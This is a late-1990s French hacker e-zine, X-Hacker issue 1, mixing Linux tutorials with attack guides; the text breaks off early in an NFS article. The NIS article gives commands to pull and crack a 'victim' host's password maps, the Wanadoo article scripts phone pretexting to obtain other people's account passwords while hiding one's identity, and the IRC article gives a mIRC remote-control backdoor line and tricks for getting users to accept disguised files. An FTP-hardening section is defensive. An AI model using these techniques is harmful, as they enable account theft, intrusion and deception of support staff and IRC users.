X================X + X-H-Mag I + + TexT version + X================X I . Disclamer : bon alors TOUTES les information contenue dans cet E-Mag n'y sont qu'a titre informatif, ‚ducatif, indicatif et dans le cadre de la liberter d'expression dans les pays d‚mocratique donc c'est a vous d'aller v‚rifier si vous avez le droit de lire se document...Et nous (moi et les autres membres) ne sommes pas responsable de se que vous ferez de ses informations (si vous les utiliser mal et que vous allez en prison c'est pas notre faute...). Donc vous n'avez pas le droit d'utiliser les techniques de hack expliquer ici (sauf si c'est legale dans votre pays) et bla bla bla je pense que vous avez compris (si vous avez un QI de plus de 45 ;)... II . Introduction : je vais vous expliquer ici mon but et celui de du groupe. Personnellement je trouve que l'underground informatique fran‡ais est MORT y'a plus que des lamez sous windows qui nuke plus vite que leur P300 =) . J'ai aussi remarquer que "l'esprit" des hacker n'existe plus. Si sa continue comme sa les mec de la DST auront plus de travail!! =) Donc on va essayer de vous expliquer des technique qui fonctionne encore de nos jours (je dis pas que se sera forsement encore valable quand vous lirez ‡a...). Donc voila vous savez pourquoi on a ‚crit sa... Now place au zine. III . Pr‚sentation : on va se d‚crire chacun vite fais modestement ;) enfin que vous situez mieux qui qu'on est, ce que l'on veut, nos mails, nø de carte bancaire, enfin tout d'interessant quoi ! RiTuaL : ritual@caramail.com -vu par KayN : adepte de la souflette, il adore la fumette -vu par Killer : Un malade de linux, bon copain et pi bon redacteur -vu par lui : heu je sais pas moi ! ;) (NdRiTuaL : KayN comme c'est poetique !) Killer : o_killer_o@hotmail.com -vu par KayN : efficace, pr‚sent, retard‚ (7h) et linuxien … donf ! -vu par RiTuaL : c un mec cool comme y devrais en avoir plus, linuxien -vu par lui : Ben en fait KayN et RiTuaL me decrivent bien. KayN : kayn@caramail.com -vu par RiTuaL : Comme moi plus souvent defoncer qu'en ‚tat normal!!=) -vu par Killer : KDE c sa vie, son PC sa raison, son sujet du bac c son papier PQ. -vu par lui : je me justifierais par ma citation pr‚f‚r‚e : Quand tu as envie de travailler, dors jusqu'a ce que ca passe Shirker: il ne veux pas etre membre mais juste ecrire un article de temps en temps (NdKiller: mais c un mec bien) Vous pouvez visiter notre sitre web : www.multimania.com/xhacker X===========X==========X + 0 . Index + X-Hacker + X===========X==========X=================X============X + Nom de l'article + auteur + X========================================X============X +0 . Index + X-Hacker + +1 . Linux pour les Newbies + RiTuaL + +2 . NIS + KayN + +3 . Hack les pages perso Wanadoo + RiTuaL + +4 . Social engineering + RiTuaL + +5 . Securite des FTP anonyme + Killer + +6 . Services linux + Killer + +7 . Network File System + KayN + +8 . L'exploit Sendmail 8.8.4 + Shirker + +9 . Effacer ses traces + RiTuaL + +9 . + & killer + +10. Connection a internet sous linux + N@-Z + +11. Lamer's trip + KayN + +12. Delire and drugs + X-Hacker + +13. Nos projets + X-Hacker + +14. Mot de la fin ... + RiTuaL + X========================================X============X X============================X========X + 1 . Linux pour les Newbies + RiTuaL + X============================X========X Bon alors pour cet article je pars du fait que vous savez installer linux (et qu'il est installer sur votre ordi). Donc je vais expliquer ici les commande de base (meme si on trouve sa dans plein d'autre E-Mag ) le fonctionnement des alias, et comment se connecter a internet (avec X-Window,Red-Hat 5.x ou +) -> Les commande de base cd : pour monter dans l'arboraissance : cd nom_du_rep ou pour descendre : cd .. rm : pour supprimer un fichier : rm nom_du_fichier ou un rep : rm -d nom_rep ps : c'est le progress status sa montre les prog lancer et donne le pid pour faire un kill cp : copie un fichier : cp fichier /dir_ou_tu_veux_copier mv : deplacer un fichier ou renomer : mv fichier /dir_ou_tu_veux_deplacer_le_fichier ou nouveau_nom ls : comme dire sous DOS, permet ausi de voir les permition de fichier : ls -l pour les fichier cacher : ls -a comme all (les fichier cacher on un . devant leur nom : .fichierCacher) su : pour se loger en simple user : su nom_d'un_user , su - user (vous place place dans le Home/nom_user quand vous ete loger) ./ : pour executer un prog (qui est dans le rep courant) : ./nom_d'un_programme df : pour voir la place qui reste sur le HD. cc : pour compiler un programme en C : cc fichier.c -o nom_du_prog gcc : idem : gcc fichier.c -o nom_du_prog g++ : idem : g++ fichier.c -o nom_du_prog dir : comme sous dos pwd : montre ou tu te trouve dans l'arboraissance ex : /etc/X11/xinit/ tar : pour detarer un fichier : tar xvf fichier.tar tarer un rep en tar.gz : tar cvfz nom_fichier.tar.gz nom_du_rep man : permet d'avoir de l'aide sur certain programme : man nom_prog (exemple : man gimp) gzip : pour "deziper" ou ziper les fichier *.gz *.tgz : gzip -d fichier.gz ou tgz (pour deziper) pour ziper gzip fichier_a_ziper find : pour trouver un fichier dans le repertoire courant : find nom_du_fichier exec : pour lancer un prog de n'importe ou dans l'arboraissance : exec /root/programme rwho : donne les user connecter kill : pour killer un prog il faut son numero pid (avec ps) puis : kill 459 par exemple date : te donne la date grep : pour rechercher du texte dans un fichier : grep texte nom_du_fichier type : pour retrouver un programme ex gimp : type gimp sa repond : gimp is "/usr/bin/gimp" mail : pour verifier si t'as du courrier(en reseau interne) pour + d'info mail --help make : je voix pas trop comment decrire cette commande mais bon elle sert surtout a installer des prog (make install) ou pour reconpiler le noyau (make xconfig) enfin bref sinon y'a aussi : make clean qui sert a effacer les fichier temporaire laisse par un(ou +) processus de compilation... sinon y'a make dep make menuconfig etc ... si vous voulez + d'info mailer moi. (pour make xconfig et make menuconfig il faut etre dans le rep /usr/src/linux) halt : pour eteindre votre PC alias : pour cr‚e un alias "temporaire" ex : alias ls="ls --color=tty -F -b -T 0" donc now tant que tu redemare pas ton ls est en couleur ... (bien que ls --color suffise) write : pour chater avec un user connecter : write nom_user (control D pour stoper le prog) unzip : pour deziper des fichier .zip : unzip fichier.zip rmdir : effacer un repertoire (faut qu'il soit vide) : rm rep_a_supprimer mkdir : pour cr‚e un repertoire : mkdir nom_du_rep_a_cr‚e chmod : pour changer les permition des fichiers ou repertoire mais j'ai pas envie de me faire chier a vous expliquer ‡a alors faite : chmod --help ou man chmod bien que se ne soit pas trop explicite enfin on veras pour expliquer mieux la prochaine fois... clear : comme cls sous dos efface l'‚cran mount : pour monter un lecteur CDROM, FLOPPY ou bien les partition windows :(par default dans /mnt ex : mount cdrom) umount : pour demonter un lecteur : umount cdrom uname -a : pour connaitre la version de ton noyau finger : donne des info sur le proprio d'une IP : finger @Ip_du_serveur (si il est sous UNIX/LINUX et si il a activer cette fonction) --help : pour avoir de l'aide sur une commande : commande --help (ex : ls --help) whoami : pour voir avec qui vous ete connecter startx : lance l'interface X-Windows useradd : pour rajouter un user a votre system : useradd RiTuaL userdel : pour supprimer un user : userdel RiTuaL ou userdel -r RiTuaL (efface le repertoire avec) shutdown : pour rebooter ou eteindre le pc : shutdown - r now pour rebooter shutdown -h now pour eteindre le pc. Voila pour les commande de base en passant une astuce : quand tu fait un dison mail --help si tu fait mail --help>nom_de_fichier sa te copie le texte d'aide dans nom_de_fichier... Et si tu fait mail --help>>nom_d'un_fichier sa rajoute le tout a la suite du fichier deja existant... On vera d'autre commande dans le nr 2 . -> Les Alias Les Alias c'est quoi??? C'est un peux comme un racourcis vers une commande ... Un peut comme dans un script mIRC ... Bon je peux pas mieux expliquer donc je vais vous mettre un exemple de fichier bashrc : (Les alias sont contenue dans /etc/bashrc c'est pas trop dur d'en cree un nouveau...) # /etc/bashrc # System wide functions and aliases # Environment stuff goes in /etc/profile # For some unknown reason bash refuses to inherit # PS1 in some circumstances that I can't figure out. #Putting PS1 here ensures that it gets loaded every time. PS1="[\u@\h \W]\\$ " alias which="type -path" alias ..="cd .." alias ...="cd /" alias cd..="cd .." alias cls="clear" alias cdrom="cd /mnt && mount cdrom && cd cdrom" alias ucdrom="cd /mnt && umount cdrom" alias floppy="mount floppy && cd floppy" alias x="startx" alias dtar="tar xvf" alias ungz="gzip -d" alias reboot="shutdown -r now" alias off="shutdown -h now" # PATH (avec KDE) PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:/opt/kde/bin ( ndKayN: tu peux mettre "." dans le path aussi, comme ca tu tape "configure" … la place de "./configure". non je suis pas fain‚ant! c pratique c tout! ca fais gagner du temps, et pis j'ai pas d'explications … donner. je vais me rendormir :) ) ( ndRiTuaL: heuu ou je t'ai mal piger ou se que tu insite les gens a faire c'est de les aider a se faire hacker ... Si y'a un . dans le PATH sa peut etre utile pour les backdoor...(style tu fait un prog ls et quand le mec tape ls ben sa look d'abord si le prog est pas dans le rep courrant... voila c'est dit) etc...... J'‚spŠre que vous avez compris comment sa fonctionne l… j'ai mis des exemples simple pour que vous compreniez bien ;) -> Connection a internet avec X-Window Bon je vais vous expliquer comment vous connecter a internet avec X-Windows (sur la Red-Hat). Loger vous en root puis aller dans le control-panel (si il est pas ouvert tapez control-panel dans un xterm) puis sur configuration reseau dans interfaces faite ajouter, une PPP puis vous mettez le numero de telephone a appeler votre identifient de connection et enfin votre pass. Ensuite faite configurer et la : Dans materiel tu mets : Utiliser le control de flux hard et les ligne modem et Autoriser tout utilisateur a activer.d‚sactiver l'interface . Dans vitesse de ligne : 115200 Port du modem : /dev/modem Dans R‚seau : Tu mets Fixe la route par default … la connexion (defaultroute) Puis dans Adresse IP distante tu mets l'IP de ton serveur Et dans Adresse IP local tu met rien si ton IP est dynamique sinon tu met l'IP que ton serveur t'as atribuer.. Si sa marche pas y'a 2 possibiliter : - tu l'enlŠve(la connexion PPP) et tu refait tout mais quand tu mets le nr de phone a appeler ton identifiant tu coches : utiliser autentification PAP - sinon faut que tu reconfigure ton noyau ... Mais sa on vera dans le prochain mag Si vous voulez d'autre info sur comment se connecter a internet avec linux allez voir l'article de N@-X : Connection a internet sous linux ... ___________ _ _______ \____ ____/ | | | \ _ | | _ _ ______ | | | |__ / | | | | | | | | / __ \ | | | __ / | | | | | | | | | __| | | | | | \ \ | | | | | |__| | | __ | | |______ |_| \_\ |_| |_| |______| |_| |_| |________\ (ndRiTuaL : tient aucun commantaire sur mon zoli n'ascii enfin pour le momment ;) ) Je voulais mettre sa dans le 2em nr mais comme on a deja mis du temps a faire celui la je le met ici (quand on sais pas quoi faire on s'amuse de peux...) EliTe GreEtZ : [UtopiA] : "sa m'‚nerve un hacker..." fluffy ou lindros : "ha bha ouais!" Shirker : T'as vu ta facture FT HAHAHAHA! Avril-Mai 1999 !!! Sickander : "tout elite et tout" adrien : c'est un futur sc‚nariste lol ;) KayN : roule toi un c“ne sa ira mieux ;) killer : une tortue ecrit plus vite que toi(article);)(humour) SPOOKY : un mec sympa... ToURisT : qui fume de la beu en regardant la mer ,) ...! Tout ceux que je n'ai pas siter : desoler ;) ("..."=phrase r‚peter + de 5 fois dans la journ‚e) Ne chercher pas a comprendre sauf si vous ete l'une des personnes que je vise (sauf peut etre fluffy paskill comprend pas tout...) X=========X======X + 2 . NIS + KayN + X=========X======X X X <- j'avais fais un bo dessin X mais il a foir‚ … la mise en page (merci ritual...) X X (NdRiTuaL : tu vas pas laisser cette merde !??) (NdKayN : tu fais jamais de conneries quand t'est d‚fais ? ) (NdRiTuaL : ben dans se cas je ferais que des conneris ! ;) (NdKiller : Rien a dire,) Lu … toi qui lis not mag et qui recherche la connaissance et non pas la destruction (ca la fais un peu a la grand chef indien, bien que je prefere les indiennes avec les copains l'‚t‚, le soir, mais je m'‚gare). Voici un petit texte sur le NIS et des ses bugs (faites moi connaitres les aut merci:) Pour comprendre fo avoir linux, s'y connaitre un peu, et surtout pas etre con. Y te faudra donc : un cerveau, un pc, des doigts pour tapauter sur le clavier, mais surtout Linux; ceux qui ont winblows, vous savez ce qui vous reste … faire. D'abord NIS c un service UNIX, qui permet des utilisateurs autoris‚s de se logger sur une machine en rezo. Toi tu te log sur la machine LUKE et la machine SOLO (toute ressemblance avec des personnes ayant exist‚s dans un film de Lucas ne serait presque pas fortuite) g‚re le NIS. Voil… donc le /etc/passwd sur LUKE : #/etc/passwd root :VcDtfTeRTTt45 :0 :1 :ze boss:/:/bin/sh bin :* :1 :1 ::/usr/local/bin/noshell gege :100 :501 : local user:/home/gege:/bin/sh +foo Pour les connaisseurs des fichiers passwd d'unix, vous avez peut etre remarqu‚ +foo qui est inhabituel. Ben voil…, c l'user ki est g‚r‚ par NIS, donc pas un user en local. Donc le prog de login qui est sur LUKE (o- tu viens de te logger) va demander … SOLO si ton nom de domaine est autorise (donc toi, chuis bon nan ?). (ndRiTuaL: heu je pense que les connaisseurs de passwd UNIX save pkoi y'a un +foo ;)) Le prog regarde la " carte NIS ", en gros, c une sorte de passwd : YODA:F45SdGhhIk.:234:789:yoda the jedi master:/home/yoda:/bin/sh Foo:3DKF9kApLWx:233253:evil hacker:/home/foo:/bin/sh Donc voil… t identifi‚ et pis t'a tes autorisations et etc comme sur une machine locale. On va voir maintenant ce qu'on peut s'amuser … faire : D'abord faire un petit rpcinfo : rpcinfo -p www.victim.com program vers proto port 100004 2 tcp 673 ypserv 100005 1 udp 721 mountd 100003 2 udp 2049 nfs 100026 1 udp 733 bootparam Et l… OH ! Miracle ! y'a ypserv ce qui inclus qu'y a NIS. C bien beau ca mais si t'a pas le nom de domaine de la machine, tu va pas aller loin. Pour ca y'a ypwhich : ypwhich -d victim www.victim.com solo.victim.com C'est donc SOLO qui g‚re le NIS et en plus ca te prouve que victim est le nom de domaine du NIS. Et maintenant t'a juste … recup le fichier passwd.byname . C'est le fichier qui g‚re le NIS. Et pour ca tu utilise ypx (peut etre avec le mag, sinon tu cherche, t majeur, non?; nan !!!!!!!!!? c jeunes d‚linquants, c pas possible! mais que vont devenir nos pov retrait‚s qui nous taxent tout nos tunes!!) Tu tape alors : ypx -d solo.victim.com victim -m passwd.byname Pis la t'a le fichier et pis je te laisse le cracker tout seul comme un grand. Bon en admettant que t'as pas le nom de domaine, il te reste une possibilit‚ : un petit showmount : xhacker% showmount -e www.victim.com ... /var (everyone) ... Donc tu peux mounter /var chez toi comme ca : % mount -t nfs www.victim.com:/var /mnt Ensuite tu vas dans /mnt/yp et tu trouve un petit fichier … cracker encore tout seul. C du boulot ! Bon voil…, c'est fini. Je vous laisse imaginer toutes les actions possibles et les suites. C'a ‚t‚ TRES rapide et vraiment PAS d‚taill‚. Je me suis bcp inspir‚ d'un fichier ecris par je sais plus qui et je sais plus o—, donc aucun m‚rites me revient, m'enfin vous pouvez tjs me remercier ;) D‚sol‚ pour les endroits o— je suis parti en d‚lire, j'ai du mal … me controler @ bient“t X==================================X========X + 3 . Hack les pages perso Wanadoo + RiTuaL + X==================================X========X Hehehe Wanadoo arf France Telecom............ Bon venons en au fait comment hacker les page web de Wanadoo..? Nan je vais d'abord vous donner un conseil (enfin c'est pour si vous aimer pas voir des mec en bleu venir cher vous ;) : si vous hacker une page perso wanadoo et que le proprio de la page r‚clamme chez FT bha y vous regarder qui s'est connecter il auront ton IP et ton nr de telephone....Donc ton nom adresse etc.. Donc je vous conseille de la faire depuis un cyber cafe ou en spoofant... Sinon je vous conseille de faire des hack cacher (juste un lien vers une page que vous aurez rajouter ..) Donc pour hacker un page wanadoo vous avez besoin de : - Le nom du mec - Le prenom du mec (si c'est pas sur sa page looker sont E-Mail a wanadoo c'est souvent : Prenom.Nom@wanadoo.fr) - heuu un telephone -> Donc la technique (trop facile (normal t'as le verre tigre =)) : Vous prennez un telephone vous numerotez : 08.03.83.33.13 (c'est l'assistance technique de wanadoo...) Puis vous trouvez une excuse du style que vous avez planter tout votre system et que vous venez de tout r‚installer et que vous ne trouver plus votre feuille d'abonner wanadoo... Donc si tous se passe bien le mec vous donne les info nom d'utilisateur + pass + pass messagerie (je croit que le pass de la page web est celui de la messagerie... (par default..)) Donc vous voila en possession d'un compte internet et de la page perso =) (Si c'est pas le bon pass retelephoner a wanadoo insister sur le fait que t'a deja phoner et que l'autre t'a pas filer le pass de la page web...sinon demander le pass en meme temps que toute les autre info...) -> Quelque senario : Vous avez besoin de : - un telephone - votre (ou une) meuf Donc si votre meuf a pas une vois de gamine de 13 ans sa devrais aller... Donc idem vous telephoner a wanadoo au tel indiquer + haut et vous dite a la meuf de se faire passer pour la femme du mec ... Elle doit dire qu'elle a planter la connection internet de son mari et qu'elle ne trouve pas la feuille d'abonner pour tout reconfigurer (elle dois aussi demander comment faire ‡a) Donc se sc‚nario est + long mais y marche mieux... A vous de l'am‚liorer... Encore un autre sc‚nario : Appelez d'une cabine et faite croire que vous devez envoyer un mail trŠs trŠs urgent et que votre fils (cr‚tin qu'il est) a planter votre portable il y a 2 jours et vous n'avez pas penssez a refaire votre connection internet et la vous ete dans la merde faite sentir au mec que c'est trŠs important pour vous d'envoyer se courrier bon! je m'arrete la mais je pense que vous avez compris ... -> Astuce : Au fait pour avoir des info sur le mec faite connaissance avec lui... Si vous avez pas son nom mailer lui que vs aimez son site et que vous voulez le renontre sur IRC, IQC, et si il accepte ben allez y demander lui ou il habite et dite lui que vous habiter dans le coin et que vous pourriez aller chez lui (comme sa il vous donne son adresse hehe) sinon parler musique et proposer lui de lui envoyer un CD de votre composition (la aussi tu resoit son adresse ;) demande lui son age aussi et sa profession si il travaille et sinon celle de son pŠre... Comme ‡a t'as toute les info qui te faut (pour si le mec de l'assistance technique te pose trop de question ou si il a du mal a trouver le dossier de votre victime .) Tu‚ une personne dans la rue : vous serez un assassin, tu‚ cette mˆme personne pendant une guerre : vous serez un h‚ro... RiTuaL X========================X========X + 4 . Social engineering + RiTuaL + X========================X========X Le social engineering tout le monde connais.(sauf si vous ete vraiment con...) Je vais vous expliquer comment faire accepter un fichier a qq'un sur IRC... Ou comme l'exemple cidessous lui faire mettre une BackDoor dans son script Les mec les plus facile a avoir c'est les newbies de l'IRC (heu nan sa depend du server si vous aller sur un server ou y'a que des hackers c'est pas la penne) mais si vous aller sur dalnet dans #france hehe... ( NdKayN: si vous allez sur irc.funradio.fr , essayez de voir un certain "blackbird" je vous parie que ca marche, y'a pas + con ! ) ( NdKiller: Sur fun, ya preske ke ca des gens komme ca mais bon, j'ai vu pire!_) Ma technique preferer est de parler au mec quand il me pose une question je lui r‚pond 30seconde je surfe. Ensuite je repond a sa question puis je lui dit : "Je viens de lire un truc sa fait peur...!" Le mec repond naturellement (si il est pas dans une autre discution) "Quoi??" Alors moi je lui dit (meme si y repond pas quoi) : "N'importe qui peux penetrer sur ton HD a cause d'un bug dans mIRC" Ne pas lui laisser le temps de r‚pondre et lui dire : "y'a aussi un truc pour se proteger ..." attendre 5 seconde : "attend je me protege" Si le mec te crois il te demande : "comment on fait??" Et la c'est gagner (sauf si le mec connais le truc) "Tu va dans ton remote et tu ecrit : CTCP 1:REMOTE: /$$2- en 1er ligne" Et alors t'as le control de son mIRC hehe tu tape (chez toi : /ctcp nick_du_mec REMOTE action_a_effectuer(/nick autre_nick ; /quit bon bye a tous et a demain sur #homo et #vrai_homme...) Tu peux faire qu'il te mette un access dans son chan si il est op... qu'il te voice, t'op qu'il kick qq'un ban etc... J'ai pas tester mais pour le faire parler je croit qu'il faut faut un : /notice #chan_ou_y_doit_parler texte... donc tu tape : /ctcp nick_du_mec REMOTE /notice #bittos Salut les mec ;) (comme ca tu peux avoir aussi les mec qui debute dans l'IRC, qui debute dans le scripting etc...)Mais c'est pas la penne d'essayer dans #Hack etc... y'a plein de lame ok mais bon y sont pas tous con a se point (quoi que je l'ai deja fait et r‚ussie sur un mec qui se prennait pour un big hacker...) Comment faire accepter un fichier a un mec...? C'est aussi facile qu'avant... Y faut trouver un mec qui a besoin d'un prog (nukenabber,winnuke etc...) alors tu lui send (dit lui qu'il teste sur toi si y veux le nuke, pis y va te dire que le prog marche pas... alors tu lui dit que tu teste le tiens et idem tu lui dit qu'il marche pas... mais propose lui en un autre qui marche et voila) Alors la les meilleur chan c'est #crack etc meme #hack t'attend qu'un mec veuille un crack et tu lui envoye un fichier avec le nom du crack le mec fera meme pas gaffe...) (En passant je tiens a remercier Utopiste pour son article dans FRhack nr1 donc j'utilise qqtruc comme exemple (la backdoor mIRC)...) ( NdKayN: euuh.. ben y'a toujours l'aut con de Blackbird sur irc.funradio.fr ) ( NdRituaL : Il est si con que sa ??? gaiden est bien aussi non?) Now quelque exemple de log (les miens) : hey gaiden salut comment on fait pour etre invincible sur IRC ??? arf pkoi tu veux etre invincible?? je veux plus me faire kicker de partout... ha alors tu va dans ton remote et t'ecrit : CTCP 1:REMOTE: /$$2- en 1er ligne puis en 2eme ligne : on 1:kick:#chan :join #chan /* comme j'utilise plus mIRC depuis longtemps (KVirc now) je lui ai filler un truc au hazard (ne pas esiter a parler compliquer moin y comprend mieux c'est */ c'est bon ?? ouais . maintenant je suis invincible ??? yep! =) (Comme j'ai plus mIRC j'me suis trouver une lame dans #hackers et je lui ai dit j'ai mis une backdoor a gaiden et je lui ai expliquer comment faire se que je voulais faire... et voila ) (NdKayN: ben ca marche pareil les ctcp sous kvirc, nan ??? ) (NdRiTuaL : ben justement non c pour sa... sinon je serais en train de renomer gaiden la ;) ) (NdKiller : BitchX RUlEzZ/_) (NdRiTuaL : Si tu le dit mais faut aimer le mode console (c comme surfer avec lynx...) X====X==========================X========X + 5. + Securite des FTP anonyme + Killer + X====X==========================X========X -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------- F ------------------- T ------------ P --------------- -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- A N O N Y M E ------------- S E C U R I S E Par Killer. Introduction. -------------- Qui suis-je? D'ou je viens, bien, tout cela a peut d'importance. J'essaye simplement d'informer les gens sur les problemes et risques d'internet. Dans cet article (qui est mon petit premier) je vais vous parler du FTP anonyme. Nous allons, ensemble essayer de voir pourquoi il est redoutable et comment faire pour le rendre moin dangereux. Cet article est destine aux Admins des serveurs qui tournent un demon FTP. Les particuliers qui veulent offrir des fichiers aux monde avec un FTPd (Pour Windows ou LINUX). Il ce peut que les informations contenues ici, vous semblent evidentes mais je tiens a ce que les gens qui ne le savent pas encore, l'apprennent et l'applique.! Voila, pour l'introduction. Qu'est-ce qu'un serveur FTP? ---------------------------- Le serveur FTP est un type de serveur qui au lieu de vous offrir des pages web comme les serveurs HTTP, vous offre une quantites d'archives ou fichiers. Ces fichiers, sont possible d'etre downloader. Un serveur FTP en parlant Hardware est concu sur les petits serveurs d'abort, d'une machine qui est connectee a un reseau et qui tourne un petit programme appele demon FTP (FTPD). Ce demon ecoute generalement le port 21 et attend des connections de clients. Dans le cas de serveurs particulier, ce demon peut tourner en meme temps que la personne surf sur internet ou tourne aussi d'autres serveurs. Dans le cas des grands reseaux, le serveur ftp est parfois meme un sous reseau constitue de plusieurs machines toutes liees entre elles puis a une qui tourne le demon FTP. Ceci est du a la plus grande anvergure du reseau. *Comment se presente une aborescence de serveur FTP?? ----------------------------------------------------- Bien, un serveur FTP se presente de la forme suivante: / Repertoire racine (pour Linux /home/ftp/) /bin Repertoire des binaries /etc Repertoire des fichiers systeme (inclu passwd) /lib Repertoire contenant certaines librairies /usr Repertoire contenant les fichiers ayant rapport aux utilisateurs /incoming Repertoire contenant des fichiers laisses par vos visiteurs /pub Repertoire contenant les fichiers que vous offrez. Pourquoi dois-je securiser mon FTP? ----------------------------------- Un serveur FTP est une partie de votre machine a laquelle vous allez permettre l'access externe de personnes parfois mal intentionnees, pour eviter que ces personnes atteignent leut but, il est preferable de leur empecher certaines formes d'access. Exemple: Sur d'anciens serveurs, la commande 'exec site' permentait d'avoir un acces au shell. Comme, si vous etes comme moi, vous aimez beacoup votre machine, vous allez vouloir securiser au maximun ce FTP. Voila pourquoi nous parlerons de FTP anonyme securise. Que dois-je faire pour securiser?? ---------------------------------- Pour securiser, je vous propose de suivre les quelques conseils qui vous seront proposes maintenant. - Il est tres important que l'utilisateur Root soit proprietaire de tous les fichiers dans les repertoires de votre FTP. Pour verifier cela tapez la commande: ls -lR ~ftp | more - L'utilisateur ftp pour se connecter n'a pas besoin de shell. Il est donc possible de remplacer celui ci par /bin/false qui n'est pas un shell valide, ceci evitera bien des intrusions. Pour effectuer cela tapez: chsh ftp Quand il vous est demande un nouveau shell, tapez: /bin/false Vous recevrez un message d'erreur, ignorez le. - Comme vous ne voulez pas que les repertoires /, /pub, /usr, /lib puissent etre modifiez, tapez: chmod 555 ~ftp chmod 555 ~ftp/usr chmod 555 ~ftp/lib chmod 555 ~ftp/pub - Il est aussi recommendable de changer les modes des repertoires /etc, /bin et ces fichiers en execution seulement pour eviter les abus, tapez pour cela les commandes: chmod 111 ~ftp/etc chmod 111 ~ftp/bin chmod 111 ~ftp/bin/* - En ce qui concerne les fichiers du repertoire /etc, il est recommende de les placer en lecture seule, en tapant: chmod 444 ~ftp/etc/* - Le repertoire /incoming est un repertoir ou les utilisateurs vous laisserons des fichiers, il n'ont donc pas besoin de savoir ce qu'il contient ni d'en effacer des fichiers, placez le pour cela en mode 1733 comme suit: chmod 1733 ~ftp/incoming - Le fichier des mots de passes qui se trouve dans /etc sous le mon de passwd de votre ftp ne doit contenir aucun mot de passe encrypte, je vous recommende de remplacer tous ces mots de passe par une *. IMPORTANT: l'utilisateur root ne dois en aucun cas avoir un champ de mot de passe vide dans ce fichier, replacer ce champ si il est vide par une *. - Pour eviter que des utilisateurs creent les fichiers .rhosts et .forward, je vous suggere de les creer vous meme et de les placer en mode de lecture seule, comme il suit: touch ~ftp/.rhosts touch ~ftp/.forward chmod 400 ~ftp/.rhosts chmod 400 ~ftp/.forward Et voila pour la securisation de votre FTP, je vous recommende tout de meme de bien vous tenir au courant des nouveaux exploits qui sont decouverts mais aussi de bien choisir le fichiers qui seront sur votre repertoire PUB. Une bonne addresse pour les exploits est rootshell. (ndRiTuaL : www.rootshell.com faut leur dire aller sur rootshell comme sa si y on pas l'URL ben y son bon pour altavista ou yahoo nan ??;p) (ndKayN : ouais mais rootshell c connu! d‚bat sur rootshell … suivre ... ;) (ndRiTuaL : tu sais y'a des perdu partout!!) Voila, ce sera a peut pres tout.! Je tiens quand meme a dire que je n'ai ecris ce document que dans un but d'ameliorer votre securite en ce qui concerne votre FTP. Mais vous voyez ce que vous en ferez. J'espere que vous avec aimez, suggerez moa des trucs pour des autres demons que vous voulez securiser. Pour tout ce qui est secu venez sur #Securoot (irc.funradio.fr) Cherchez soit Kayn ou Killer ou mem n'importe kel op peut vs repondre.! (ndRiTuaL : h‚ moi ??!) Allez a++ Sur IRC ou mem a ma boite E-Mail: o_killer_o@hotmail.com Killer, sur irc.funradio.fr When the night has something to say, you don't know what to do! X=====X====================X========X + 6 . + Services linux + Killer + X=====X====================X========X Ben en fait, je savais pas trop sur koa vous ecrire et je pense que ke ne sais pas encore. ya bien un truc ki est assez interessant. Sur les machines LINUX c'est les services. Pourquoi quand j'installe, j'ai d'ofice HTTPD, FTPD, IMAPD et tous ces demons? Comment je les enleve si je les utilise pas? Hein? Moa j'ai pas envie de mettre des pages web sur internet et que les gens viennent me faire chier sur mon FTP a essayer de trouver des trous de securite qui leur permettron de foutre la merde sur mon PC! Comment je dois faire pour ne plus que ces 'services' se lancent au demarrage??? Bon, ceci c'est la preocupation de la majorite des utilisateurs de LINUX sur internet. Sur le #Securoot c'est le truc d'ont j'entend le plus parler et c'est le truc dont je parle le plus. Voila. Ben en fait, les services. (Pas tous mais la plupart) ce sont des demons. Cad des petits programmes qui se lancent en memoire et qui y restent. Essayer de faire un ps -x vous verrez que vous avez surement la des lignes du style: 1 ? S 0:02 init[3] 2 ? SW 0.00 (kflishd) 3 ? SW< 0.00 (kswapd) 166 ? S 0:00 syslogd 175 ? S 0:00 klogd 187 ? S 0:00 inetd Ben en fait, la majorite de ces programmes ce sont des demons. ceux ki ont un ? dans le TTY. Il est possible de regler le nombre de ces programmes que vous lancez. Pour la redhat, ces distributions assez populaires parke faciles a utiliser et beucoup plus user friendly ke la slackware (ke je prefere personnelement) REDHAT ------ Pour cette version il vous suffir de lancer un script appele "setup". La vous voyez apparaitre un truc pour setuper votre machine. (NdRiTuaL :setuper t'a trouver sa ou ?? ) Allez avec vos doits sur le clavier jusqu'a ntsysv et vous appuyez dur enter. Apres, vous verez une liste incroyable de services systemes. (Demons) Appuyez sur F1 pour obtenir plus d'information sur un demon specifique. Choisisez les demons que vous voulez lancer par une * dans la case a cote de leur nom et ceux que vous ne voulez pas sans mettre un * a cote du nom. Apres, dirigez vous sur OK Aprez ceci, vous revenez sur le menu central. Appuyez sur F12 ou selectionnez quitter pour sortir. Voila pour quelques demons, les autres je les mettrais dans le prochain X-Mag. SlackWare --------- Avec SlackWare, je vais vous expliquer petit a petit. Choisissez votre editeur de texte favori. Identifiez vous en tant que root. editez le fichier /etc/inet.conf Voila. Le inetd est le demon qui se charge de lancer tous les services de base. ici les demons sont places un par ligne. Commentez les lignes de demons qui ne seront pas utilises! Et puis apres vous envoyez un signar de SIGHUP au pid de inetd exemple kill -1 pid Voila pour la slackware. Bon, dans le prochain numero! Je vous explique comment faire pour les autres service. Je greet pour cet article: RiTuaL pour L'inspiration KayN Pour sa participation sur #Securoot (NdRiTuaL : et moi? (pour la 2Šme fois !!) Midnight_Chorus pour ses dessins Na-Z pour son article kernal2 pour son serveur 208.226.48.179 et pi c tout voila a++++ Killer o_killer_o@hotmail.com X===========X======X + 7 .NFS + KayN + X===========X======X Me revoil… avec un nouvel article, enfin pas si nouveau que ca en fait, mais je le trouve assez interessant par ce qu'il permet d'avoir un bon apercu du fonctionnement rezo sous linux et du partage fichiers. Et ceux qui voudraient dire que je suis pas capable de faire un article avec un sujet de + de 3 lettres, ont tort!! mon prochain article portera sur LILO ;))) bon, comme tjs, vous devez avoir linux, ou bien n'importe quel systeme UNIX qui gere le mountage du NFS (m'enfin linux c mieux ;). Bon c partiiiiii !!!!!! - C koooooooiiiiii ??? NFS : nouille-fromage-sucre . beeeuurkk ! ils me font halluciner ceux qui mettent du sucre dans les pattes !! c immonde ! nan, serieux, NFS ca veut dire Network File System. Z'etes content de le savoir, hein ? En fait, ca permet de partager les fichiers entre diff‚rentes machines mont‚es toute en rezo, LAN, intranet, 